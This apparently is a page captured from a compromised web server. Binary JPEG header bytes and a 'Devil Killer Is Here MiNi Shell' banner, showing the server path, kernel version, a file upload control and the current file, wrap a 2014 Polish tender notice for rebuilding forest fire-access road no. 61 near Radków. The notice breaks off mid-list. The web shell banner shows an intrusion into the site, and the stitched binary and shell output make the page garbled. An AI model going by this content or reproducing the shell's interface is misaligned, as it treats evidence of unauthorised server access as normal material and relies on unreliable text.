JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140527/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140527/113779-N-2014.html

<p class="kh_header"><b>Koniecpol: Wykonanie przebudowy drogi leśnej wewnątrzzakładowej ppoż. nr 61 w Leśnictwie Kossów - Radków, obręb Kossów, Gm. Radków, pow. Włoszczowa, woj. Świętokrzyskie</b><br>
<b>Numer ogłoszenia: 113779 - 2014; data zamieszczenia: 27.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe - Nadleśnictwo Koniecpol , Różana 11, 42-230 Koniecpol, woj. śląskie, tel. 034 3551285, faks 034 3551265.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koniecpol.katowice.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie przebudowy drogi leśnej wewnątrzzakładowej ppoż. nr 61 w Leśnictwie Kossów - Radków, obręb Kossów, Gm. Radków, pow. Włoszczowa, woj. Świętokrzyskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudowy wewnątrzzakładowej drogi leśnej w planach urządzania lasu wyznaczonej jako dojazd pożarowy nr 61 w Leśnictwie Kossów (etap I) - Radków (etap II), Nadleśnictwo Koniecpol - przebiegająca przez odziały: 42, 29, 43, 30, 31, 32, 33, 34 - działki nr 1158, 1151, 1178, 1173, 1174, 1175, 1176, 1177 obręb ewidencyjny Kossów, Gm. Radków, pow. Włoszczowa, woj. Świętokrzyskie.    
Długość całkowita odcinka do przebudowy wynosi 2808 mb (w tym: etap I - 563 mb, etap II - 2245 mb, oba etapy traktowane jako jedno zadanie), szerokość jezdni 3,50 m, szerokość poboczy 0,75 - 1,00 m, pochylenie poprzeczne jezdni obustronne 3 %, spadek poprzeczny poboczy 6 %.
Na całą drogę po odpowiednim przygotowaniu podłoża należy dostarczyć i wbudować kruszywo łamane o uziarnieniu 0,00 - 63,0 mm jako warstwa stabilizowana mechanicznie stanowiąca podbudowę o grubości warstwy po zagęszczeniu 20 cm, warstwa górna o grubości po zagęszczeniu 10 cm wykonana z mieszanki kruszywa stabilizowanego mechanicznie o uziarnieniu 0,00 - 31,5 mm, górna warstwa do zamiałowania za pomocą drobnej mieszanki kruszywa o frakcji 0,00 - 4,00 mm.
Na drodze należy wykonać: mijanki, skrzyżowania, renowację, konserwację oraz nowe rowy przydrożne i odpływowe, odparowniki, należy wbudować przepusty z rur PEHD  pod koroną drogi i jako zjazdy z jednoczesnym montażem przyczółków (murki czołowe wlotów i wylotów przepustów). Prędkość projektowana 30 km/h.

             W skład zamówienia wchodzą:
roboty przygotowawcze z karczowaniem pni
roboty ziemne

wykonanie podbudowy
wykonanie nawierzchni
wykonanie pozostałych budowli projektowanych na drodze
wykonanie odwodnienia
wykonanie robót wykończeniowych
        
Szczegółowy zakres prac zawiera opracowany projekt wykonawczy wraz z branżowymi rysunkami 
wykonawczymi, przedmiary robót ze ślepych kosztorysów stanowiących załącznik 5 do SIWZ (etap I i II drogi stanowią oddzielne kosztorysy). Prace winny być wykonane zgodnie z: opracowanym projektem wykonawczym w/w przebudowy, po podpisaniu umowy jeden egzemplarz dla  Wykonawcy, szczegółową specyfikacją techniczną, kosztorysem ofertowym, z zasadami wiedzy technicznej i obowiązującymi przepisami w szczególności techniczno-budowlanymi oraz normami. 

Odbiór prac odbywał się będzie zgodnie ze szczegółową specyfikacją techniczną - załącznik nr 7 do SIWZ.
         	
Zaleca się aby Wykonawca dokonał wizji lokalnej na terenie budowy oraz zdobył wszelkie informacje 
które mogą być konieczne do przygotowania oferty.
  
Zastosowane nazwy producentów i produktów ujęte w projekcie wykonawczym, niniejszej SIWZ i przedmiarach robót będące przedmiotem zamówienia służą tylko i wyłącznie doprecyzowaniu przedmiotu zamówienia, a zamówienie należy wykonać z materiałów wskazanych w projekcie lub równoważnych a użyte w trakcie wykonania zamówienia materiały i urządzenia muszą mieć aktualne dokumenty, dopuszczające do stosowania w budownictwie, zgodnie z przepisami obowiązującymi w tym zakresie jak również są zgodne z obowiązującymi normami (Polską Normą, Zharmonizowanymi Normami Europejskimi) lub posiadają aprobaty techniczne, potwierdzające  że mogą być zastosowane do wykonania przedmiotu zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W przypadku wystąpienia konieczności wykonania ewentualnych robót uzupełniających 
    Zamawiający może udzielić Wykonawcy zamówienie uzupełniające o którym mowa w Ustawie 
    Prawo zamówień publicznych art. 67 ust.1 pkt 6. (max. do 50 % wartości zamówienia  
    podstawowego).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.32.20-7, 45.10.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> a)  Każda oferta musi być zabezpieczona wadium o wartości : 20000 PLN (słownie: dwadzieścia 
            tysięcy zł. zero gr.)
      b)  Wadium należy wnieś w jednej lub kilku formach zgodnie z art. 45 ustawy z dnia 29 stycznia 
           2004r. Prawo zamówień publicznych (tekst jednolity Dz. U. 2013r. poz. 907 wraz z 
           późniejszymi zmianami)
	c) Wadium w formie pieniężnej należy wnieść na rachunek bankowy zamawiającego: Bank 
            Ochrony Środowiska w Częstochowie  Nr 71 1540 1014 2001 7307 4476 0001 z dopiskiem na 
           blankiecie przelewu: Wadium na przebudowę drogi 61 w L. Kossów, Radków.
           Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem można dołączyć 
     do oferty.  
      d) Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w terminie składania ofert znajdzie się 
          na rachunku bankowym zamawiającego. Wykonawca który nie wniesie wadium zostanie 
          wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
      e) Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji
          ubezpieczeniowej, lub poręczeniach udzielanych przez Polską Agencję Rozwoju 
          Przedsiębiorczości należy załączyć w formie oryginału do oferty.
          Z treści poręczenia (gwarancji) musi jednoznacznie wynikać, jaki jest sposób reprezentacji
          gwaranta. Gwarancja musi być podpisana przez upoważnionego przedstawiciela gwaranta. 
          Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np.: złożony wraz z 
          Imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).
          Z treści gwarancji powinno wynikać bezwarunkowo, że na każde pisemne żądanie zgłoszone przez
          zamawiającego w terminie związania z ofertą, zobowiązanie gwaranta do wypłaty 
          zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4 a i ust. 5 
          ustawy Prawo zamówień publicznych.
f)	Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców, zamawiający  
      przekaże do banku niezwłocznie po:
1)  wyborze oferty najkorzystniejszej (z wyjątkiem wykonawcy którego oferta została 
                 wybrana),
2)  wykonawcy którego oferta została wybrana po zawarciu umowy w sprawie zamówienia    
                 publicznego i wniesieniu zabezpieczenia należytego wykonania tej umowy,


g)  Zamawiający niezwłocznie dokona zwrotu wadium na wniosek wykonawcy:
1)  który wycofał ofertę przed upływem terminu składania ofert,
      h)  Wadium wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z odsetkami 
            w przypadku, gdy wykonawca:
1)	odmówi podpisania umowy na warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy,
4)	w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3 PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 PZP, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:

  1. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy
                  prawa nakładają obowiązek ich posiadania;
              2. posiadają wiedzę i doświadczenie. Warunek posiadania wiedzy i doświadczenia zostanie 
                  

                  
                  uznany przez Zamawiającego za spełniony jeśli Wykonawca przedstawi wykaz robót 
                  budowlanych o podobnym charakterze (robót drogowych polegających na wykonaniu   
                  robót ziemnych łącznie z wykonaniem jednej bądź kilku podbudów z kruszywa łącznie z  
                  wykonaniem jednej bądź kilku nawierzchni drogowych z kruszywa (warstwa górna)) 
                  wykonanych w ciągu ostatnich 5 lat o wartości minimum 700000,00 zł (siedemset tysięcy zł) 
                  brutto każda (minimum 3 pozycje), w przypadku firm nowych (działalność poniżej 5 lat) za 
                  okres prowadzenia działalności (każda z prac poparta dowodami, że roboty te zostały 
                  wykonane w sposób należyty oraz wskazującymi, czy zostały wykonane zgodnie z zasadami 
                  sztuki budowlanej i prawidłowo ukończone);
  3. dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania 
      Zamówienia. Zamawiający uzna warunek za spełniony gdy Wykonawca będzie 
      dysponował przynajmniej jedną osobą posiadającą uprawnienia do kierowania robotami 
      budowlanymi w zakresie zgodnym z przedmiotem zamówienia (uprawnienia budowlane do 
      kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej, konstrukcyjno-
      inżynieryjnej w zakresie dróg (mostów), w specjalności drogowej), oraz osoba ta będzie 
      przynależeć do Polskiej Izby Inżynierów Budownictwa zgodnie z wymogami zawartymi w 
      ustawie Prawo Budowlane;
              4. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
                  Warunek sytuacji ekonomicznej i finansowej zostanie uznany przez Zamawiającego za 
                  spełniony jeśli Wykonawca przedstawi aktualną i opłaconą polisę ubezpieczeniową, bądź 
                  inny dokument potwierdzający że Wykonawca jest ubezpieczony od odpowiedzialności 
                  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - kwota 
                  minimalna ubezpieczenia nie może być niższa niż 700000,00 zł (siedemset tysięcy zł); 
  5. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ustawy) 
  6. wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum). 

                  W takim przypadku ich oferta musi spełniać następujące wymagania:
-wykonawca do oferty dołączy pełnomocnictwo wszystkich stron (podmiotów) występujących wspólnie (konsorcjum), jeżeli takie będzie ubiegać się o zamówienie wykonawcy, (wymaga się solidarnej odpowiedzialności wykonawców).
-każdy z przedsiębiorców wchodzący w skład konsorcjum oddzielnie składa oświadczenie, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 (załącznik nr 2 do SIWZ) ustawy Prawo zamówień publicznych. Razem z oświadczeniem każdy z członków konsorcjum składa także dokumenty potwierdzające że nie podlega wykluczeniu na podstawie art. 24 PZP - SIWZ pkt. 9 c, d.
-wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie musi wynikać z treści pełnomocnictwa. 
Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
-wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na wykonawcę; w miejscu np. nazwa i adres wykonawcy należy wpisać dane pełnomocnika konsorcjum (lidera).
Uwaga: wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem 
              (liderem). W przypadku wybrania oferty Wykonawców wspólnie ubiegających się zamówienie 
              przed zawarciem umowy w sprawie zamówienia publicznego Zamawiający będzie żądać 
              umowy regulującej współpracę tych Wykonawców. Warunki udziału w postępowaniu muszą 
              być spełnione przez wszystkich Wykonawców obiegających się wspólnie o zamówienie.
7.	wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem oferty, z 
        zastrzeżeniem art. 93 ust. 4 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie 
                  

                  
                  uznany przez Zamawiającego za spełniony jeśli Wykonawca przedstawi wykaz robót 
                  budowlanych o podobnym charakterze (robót drogowych polegających na wykonaniu   
                  robót ziemnych łącznie z wykonaniem jednej bądź kilku podbudów z kruszywa łącznie z  
                  wykonaniem jednej bądź kilku nawierzchni drogowych z kruszywa (warstwa górna)) 
                  wykonanych w ciągu ostatnich 5 lat o wartości minimum 700000,00 zł (siedemset tysięcy zł) 
                  brutto każda (minimum 3 pozycje), w przypadku firm nowych (działalność poniżej 5 lat) za 
                  okres prowadzenia działalności (każda z prac poparta dowodami, że roboty te zostały 
                  wykonane w sposób należyty oraz wskazującymi, czy zostały wykonane zgodnie z zasadami 
                  sztuki budowlanej i prawidłowo ukończone);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony gdy Wykonawca będzie 
      dysponował przynajmniej jedną osobą posiadającą uprawnienia do kierowania robotami 
      budowlanymi w zakresie zgodnym z przedmiotem zamówienia (uprawnienia budowlane do 
      kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej, konstrukcyjno-
      inżynieryjnej w zakresie dróg (mostów), w specjalności drogowej), oraz osoba ta będzie 
      przynależeć do Polskiej Izby Inżynierów Budownictwa zgodnie z wymogami zawartymi w 
      ustawie Prawo Budowlane</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek sytuacji ekonomicznej i finansowej zostanie uznany przez Zamawiającego za 
                  spełniony jeśli Wykonawca przedstawi aktualną i opłaconą polisę ubezpieczeniową, bądź 
                  inny dokument potwierdzający że Wykonawca jest ubezpieczony od odpowiedzialności 
                  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - kwota 
                  minimalna ubezpieczenia nie może być niższa niż 700000,00 zł (siedemset tysięcy zł)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnej zmiany zawartej umowy, w następującym 
      zakresie: 
1) wysokości wynagrodzenia w przypadku: 
	zmiany stawki podatku VAT, w odniesieniu do tej części wynagrodzenia, której zmiana
                 dotyczy, 
	w przypadku zaistnienia konieczności zmian zakresu robót wprowadzonych na wniosek
                 inspektora nadzoru (przekazywanych zawsze w formie pisemnej i potwierdzonych przez  
                 Zamawiającego), 

2) terminu realizacji przedmiotu zamówienia, gdy jest ona spowodowana: 
	siłą wyższą - rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego,  
                 niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy 
                 zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego

 
                 zobowiązania w części lub całości, a w szczególności epidemią stwierdzoną przez uprawnione do 
                 tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym, 
	warunkami pogodowymi uniemożliwiającymi wykonywanie prac zewnętrznych 
                 (np. intensywne opady atmosferyczne, powodzie, ekstremalnie wysokie lub niskie temperatury), 
	następstwem okoliczności leżących po stronie Zamawiającego, takich jak: utrudnienia,      
                 zawieszenia robót lub przeszkodami dającymi się przypisać Zamawiającemu, 
	koniecznością wprowadzenia zmian do dokumentacji projektowej na etapie wykonawstwa 
                 robót z przyczyn niezależnych od obu stron, aktualizacją rozwiązań projektowych z uwagi na 
                 postęp  technologiczny, 
	koniecznością wykonania robót dodatkowych wpływających na termin wykonania robót 
                 objętych niniejszą umową podstawową, 
	następstwem działania organów administracji lub innych podmiotów, związanych z 
                 przekroczeniem obowiązujących terminów wydawania lub odmowy wydania decyzji, zezwoleń,  
                 uzgodnień, 
	następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających 
                 wpływ na realizację przedmiotu zamówienia, 
	wystąpienia odmiennych warunków geologicznych, terenowych, środowiskowych niż
                 przyjęto w dokumentacji; 

3) podwykonawcy, jeżeli podwykonawca nie wykonuje prac z należytą starannością, uległ likwidacji, 
    doszło do rozwiązania umowy łączącej go z Wykonawcą. 
4) zmiany zakresu części prac powierzonych podwykonawcy w przypadku gdy: 
	konieczność powierzenia przez Wykonawcę prac podwykonawcy spowodowana jest 
                rozwiązaniem umów o pracę z pracownikami wykonującymi pracę w danej branży w takiej liczbie,  
                która uniemożliwia realizację prac przez Wykonawcę, 
	wprowadzenie nowego podwykonawcy zapewni lepszą realizację danej części
